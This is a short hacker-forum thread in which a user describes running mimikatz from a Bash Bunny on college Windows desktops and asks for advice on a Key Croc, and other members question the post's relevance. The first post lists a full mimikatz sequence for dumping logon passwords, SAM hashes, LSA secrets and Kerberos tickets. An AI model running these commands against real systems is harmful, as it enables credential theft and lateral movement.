Spraggins Designs Posted October 30, 2021 Share Posted October 30, 2021 I already own the Bash Bunny Mark II, WiFi Pineapple Mark VII, and Ruber Ducky Deluxe. I already am OSCP certified and run a clean Kali Linux 2021.3 right now. I have enjoyed helping contribute to some of the code over at Bash Bunny Mark II GitHub Repository I also work in IT and Web Design/Marketing at my college, and with my OSCP, they allow me to pentest their networks and devices. Just today, I was able to use mimikatz on three different desktops running Windows 10 and Sophos. I managed to dump three logs, with: This was quite amazing. I had to change a few things around. Still, ultimately I only needed the BB to carry the executable as a USB Drive, haha. Anyway, any suggestions or advice for the Key Croc? I got it because I do not see anything else worth getting at the moment, and it also is in stock. privilege::debug log filename.log token::elevate sekurlsa::logonpasswords sekurlsa::tickets /export vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert This was quite amazing. I had to change a few things around. Still, ultimately I only needed the BB to carry the executable as a USB Drive, haha. Anyway, any suggestions or advice for the Key Croc? I got it because I do not see anything else worth getting at the moment, and it also is in stock. I also dumped 43 .kirbi files as well. Link to comment Share on other sites More sharing options...
dark_pyrro Posted October 30, 2021 Share Posted October 30, 2021 Not sure I follow the post fully. What does the Mimicatz thing (and other inserted info) have to do with your question about what to do with the soon to be delivered Key Croc? Generally it's rather difficult to give meaning to others decision to buy products if they don't see any use cases for it themselves. Start by reading the docs about the Croc and look at the Hak5 GitHub to get some inspiration on how it can be used and in what scenarios. There are some videos available as well. Get the free Key Croc e-book in the Hak5 shop and read it. In any way, the GitHub repos will keep you busy for quite a while. It also seems like you have a colleague using the (almost) same nick on this forum since you seem to work in the same place with the same things and have the same background. Since both of you seem to be allowed to pentest your college equipment, perhaps you both should talk to the college about pentest scenarios where the Croc could be used. Being an OSCP, you most certainly have a lot of knowledge about what scenarios that could be considered useful for the Croc. Just curious, what code have you contributed when it comes to the Bash Bunny? Link to comment Share on other sites More sharing options...
kuyaya Posted October 30, 2021 Share Posted October 30, 2021 yeah, I'd recommend getting it. Also, the mimikatz and OSCP thing is just pure flex, no? It doesn't add anything to the question :P. Why would you brag about it... Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.